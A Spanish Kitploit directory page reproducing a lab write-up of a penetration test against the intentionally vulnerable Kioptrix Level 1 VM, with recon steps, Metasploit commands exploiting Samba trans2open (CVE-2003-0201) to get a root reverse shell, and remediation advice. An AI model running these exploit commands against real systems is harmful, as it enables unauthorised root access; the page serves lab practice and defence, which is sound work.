Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Kioptrix-Level1-Vulnerability-Analysis — Auditoría técnica de Kioptrix Level 1. Enfoque: explotación de Samba 2.2.1a (CVE-2003-0201), enumeración manual y endurecimiento de la infraestructura interna. | Kitploit
Herramientas/GitHubGitHub/deepakkcybersec-eng/kioptrix-level1-vulnerability-analysis
Escalada de PrivilegiosReconocimientoAnálisis de VulnerabilidadesExplotaciónSeguridad de RedesPruebas de PenetraciónAprendizaje y EducaciónRed TeamingLabs y Práctica

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHubdeepakkcybersec-eng/kioptrix-level1-vulnerability-analysis

Kioptrix-Level1-Vulnerability-Analysis

Auditoría técnica de Kioptrix Level 1. Enfoque: explotación de Samba 2.2.1a (CVE-2003-0201), enumeración manual y endurecimiento de la infraestructura interna.

Ver Repositorio
hace 7 mesesAún no revisado

Kioptrix Level 1: Auditoría y Explotación de Vulnerabilidades de Espectro Completo

🏛️ Objetivo Profesional

El objetivo era realizar una prueba de penetración estructurada en el entorno Kioptrix Level 1 para lograr el compromiso total de 'root' y documentar estrategias técnicas de remediación adecuadas tanto para operaciones de Red Team como de Blue Team.

🏗️ Reproducción del Entorno (Trasfondo del Hardware)

Los valores predeterminados de virtualización modernos a menudo fallan en kernels antiguos de 2010. Para arrancar y conectar esta máquina en red correctamente, se requirieron las siguientes configuraciones arquitectónicas específicas:

  • Subtipo de SO: Linux / Red Hat (32-bit).
  • Arquitectura de almacenamiento: Se cambió de SATA a controlador IDE para admitir el disco duro .vmdk heredado.
  • Protocolo de red: Configurado como PCI FAST-III con un adaptador Host-only para permitir la comunicación interna con la máquina de ataque Kali Linux.

⚔️ Análisis Ofensivo (Ruta Red Team)

La explotación siguió un ciclo de vida manual de enumeración a explotación:

1. Descubrimiento y Reconocimiento

  • Netdiscover: Se utilizó netdiscover -r 192.168.184.4 para identificar la IP del objetivo.
  • Escaneo Nmap: Identificó servicios como SSH (22), HTTP (80), RPC (111) y NetBIOS-SSN (139). Samba 2.2.1a fue marcado como el punto de entrada principal.

2. Explotación (Samba trans2open)

  • Vulnerabilidad: CVE-2003-0201 (Desbordamiento de montón).
  • Mapeo MITRE ATT&CK: - Táctica: Escalada de Privilegios (TA0004)
    • Técnica: Explotación para Escalada de Privilegios (T1068)
  • Protocolo de Metasploit:
    • use exploit/linux/samba/trans2open
    • set RHOSTS 192.168.114.5
    • set payload linux/x86/shell/reverse_tcp
  • Resultado: Generó con éxito una shell inversa. El comando whoami devolvió root.

🛡️ Remediación Defensiva (Ruta Blue Team)

Para proteger un entorno empresarial, son obligatorias las siguientes estrategias de Gestión de Vulnerabilidades (VM):

  • Protocolo de parcheo: Actualice Samba a la última versión compatible (Samba 4.x). La vulnerabilidad en la función call_trans2open está efectivamente parcheada en todas las versiones modernas.
  • Endurecimiento de red: Implemente cortafuegos basados en host para restringir los puertos 139 y 445 únicamente a subredes internas de confianza.
  • Estrategia de rol de VM: Esta remediación se enmarca en los ciclos estándar de Gestión de Vulnerabilidades en horario laboral, garantizando la estabilidad de la infraestructura.

📝 Evidencia Técnica y Registros Manuales

Las siguientes imágenes documentan la enumeración manual en vivo y la ejecución en la terminal:

Notas de Descubrimiento del Objetivo y de Arquitectura

Notas Manuales 1

Lógica de Comandos de Metasploit y Configuración del Payload

Notas Manuales 2

Prueba de Acceso Root (Captura de Terminal)

Evidencia de Shell Root

Descargar herramienta